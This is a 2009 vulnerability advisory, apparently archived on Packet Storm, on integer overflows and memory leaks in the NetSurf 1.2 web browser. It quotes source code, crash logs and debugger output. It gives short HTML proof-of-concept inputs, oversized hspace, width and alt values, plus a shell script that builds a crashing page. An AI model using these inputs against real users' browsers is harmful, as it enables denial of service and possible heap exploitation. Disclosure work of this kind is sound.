what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Netsurf 1.2 Multiple Vulnerabilities

Netsurf 1.2 Multiple Vulnerabilities
Posted Jan 15, 2009
Authored by Jeremy Brown | Site jbrownsec.blogspot.com

The NetSurf web browser version 1.2 suffers from integer overflows and memory leaks.

tags | advisory, web, overflow, memory leak
SHA-256 | 255be4475049790276b3f94b3ab54a4b1e0f80dad6dc21db35acfc31b63ebb0a

Netsurf 1.2 Multiple Vulnerabilities

Change Mirror Download
--------------------------------------------------------------------------------------------------------------------------------------------

[Jeremy Brown 01-14-2009]
0xjbrown41@gmail.com/jbrownsec.blogspot.com
netsurf_multiple_adv.txt
--------------------------------------------------------------------------------------------------------------------------------------------

NetSurf Web Browser 1.2
http://www.netsurf-browser.org
Debian, Ubuntu, etc packages, or source code available @ http://www.netsurf-browser.org/downloads/releases/netsurf-1.2-src.tar.gz

Several bugs, including integer overflows and memory leaks, have been found in the NetSurf web browser. At one point in the research,
I was able to overwrite the ESI register with my own data which could lead to heap based exploitation of at least [Problem #2] of the bugs.
I was able to pass large values to several html tag attributes and make the program do huge malloc()'s. Some of the code seems to check for
small numbers when parsing values then attempting to render content, but large numbers trigger integer overflows when allocating memory.

--------------------------------------------------------------------------------------------------------------------------------------------

{Problem #1]

render/box_construct.c [1110-1136]:

if ((strcmp((const char *) n->name, "img") == 0) ||
(strcmp((const char *) n->name, "image") == 0) ||
(strcmp((const char *) n->name, "applet") == 0)) {
if ((s = (char *) xmlGetProp(n,
(const xmlChar *) "hspace"))) {
/* percentage hspace not implemented */
if (!strrchr(s, '%')) {
int value = isdigit(s[0]) ? atoi(s): -1;
if (0 <= value && !author->margin[LEFT]) {
style->margin[LEFT].margin =
CSS_MARGIN_LENGTH;
style->margin[LEFT].value.length.value =
value;
style->margin[LEFT].value.length.unit =
CSS_UNIT_PX;
}
if (0 <= value && !author->margin[RIGHT]) {
style->margin[RIGHT].margin =
CSS_MARGIN_LENGTH;
style->margin[RIGHT].value.length.
value = value;
style->margin[RIGHT].value.length.unit =
CSS_UNIT_PX;
}
}
xmlFree(s);
}

(netsurf:31889): GdkPixbuf-CRITICAL **: gdk_pixbuf_scale: assertion `src != NULL' failed
(netsurf:31889): GLib-GObject-CRITICAL **: g_object_unref: assertion `G_IS_OBJECT (object)' failed
The program 'netsurf' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadAlloc (insufficient resources for operation)'.
(Details: serial 1071 error_code 11 request_code 53 minor_code 0)
(Note to programmers: normally, X errors are reported asynchronously;
that is, you will receive the error a while after causing it.
To debug your program, run it with the --sync command line
option to change this behavior. You can then get a meaningful
backtrace from your debugger if you break on the gdk_x_error() function.)

Program exited with code 01.

[ltrace log -- hspace = 30000, without --sync]

gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
= 0x8cbda01
cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)
= 0
cairo_rectangle(0xb6600948, 0, 0, 0, 0)
= 0
cairo_clip(0xb6600948, 0, 0, 0, 0)
= 0xb6600aec
gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
= 0x8cbda01
gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>
malloc(3073536192) /// HUGE MALLOC
= NULL
<... gdk_pixbuf_get_from_drawable resumed> )
= 0
gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>
free(0xb6600dc8)
= <void>
free(0xb6600de0)
= <void>

PoCs: <applet code='test.class' hspace='32767'>
<img src='test.jpg' hspace='32767'>

--------------------------------------------------------------------------------------------------------------------------------------------

[Problem #2]

render/layout.c [526-539]:

/* add margins, border, padding to min, max widths */
calculate_mbp_width(block->style, LEFT, &extra_fixed, &extra_frac);
calculate_mbp_width(block->style, RIGHT, &extra_fixed, &extra_frac);
if (extra_fixed < 0)
extra_fixed = 0;
if (extra_frac < 0)
extra_frac = 0;
if (1.0 <= extra_frac)
extra_frac = 0.9;
block->min_width = (min + extra_fixed) / (1.0 - extra_frac);
block->max_width = (max + extra_fixed) / (1.0 - extra_frac);

assert(0 <= block->min_width && block->min_width <= block->max_width);
}

$ calc 32767*32767*2+131006
2147483584

$ cat ns.sh ns2.sh
echo "<iframe src='test.jpg' width='$1'>`perl -e 'print "A" x 99999999'`" > int.html
echo "<iframe src='test.jpg' width='$1'>" > int.html
$

(gdb) shell ./ns.sh 2147483584
(gdb) r file:///home/rush/Desktop/int.html

[width = 2247483583 (2147483584+99999999) & 99,999,999 A's appended to test html file]

Program received signal SIGABRT, Aborted.
[Switching to Thread 0xb6d78720 (LWP 28933)]
0xb804e430 in __kernel_vsyscall ()
(gdb) i r
eax 0x0 0
ecx 0x7105 28933
edx 0x6 6
ebx 0x7105 28933
esp 0xbfb4cfe4 0xbfb4cfe4
ebp 0xbfb4cffc 0xbfb4cffc
esi 0xb7532b97 -1219286121
edi 0xb754fff4 -1219166220
eip 0xb804e430 0xb804e430 <__kernel_vsyscall+16>
eflags 0x206 [ PF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) bt
#0 0xb804e430 in __kernel_vsyscall ()
#1 0xb7421880 in raise () from /lib/tls/i686/cmov/libc.so.6
#2 0xb7423248 in abort () from /lib/tls/i686/cmov/libc.so.6
#3 0xb741a72e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
#4 0x080a7cdd in ?? ()
#5 0x080a75e2 in ?? ()
#6 0x080a747d in ?? ()
#7 0x080ab3f0 in layout_document ()
#8 0x0809f073 in html_reformat ()
#9 0x080a0d95 in html_convert ()
#10 0x0805980c in content_convert ()
#11 0x0805cc49 in ?? ()
#12 0x0805a6c1 in fetch_send_callback ()
#13 0x08060c23 in ?? ()
#14 0x0806110f in ?? ()
#15 0x0805afe9 in fetch_poll ()
#16 0x08088276 in gui_poll ()
#17 0x0807fe94 in main ()

PoCs: <iframe src='test.jpg' width='2147483584'>
<hr width='2147483584'>

--------------------------------------------------------------------------------------------------------------------------------------------

[Problem #3]

Memory leak & huge system resource consumption.

render/box_construct.c [1494-1514]:

bool box_image(BOX_SPECIAL_PARAMS)
{
bool ok;
char *s, *url;
xmlChar *alt, *src;

if (box->style && box->style->display == CSS_DISPLAY_NONE)
return true;

/* handle alt text */
if ((alt = xmlGetProp(n, (const xmlChar *) "alt"))) {
s = squash_whitespace((const char *) alt);
xmlFree(alt);
if (!s)
return false;
box->text = talloc_strdup(content, s);
free(s);
if (!box->text)
return false;
box->length = strlen(box->text);
}

PoC: <img src='test.jpg' alt='"A" x ~2000'>

--------------------------------------------------------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close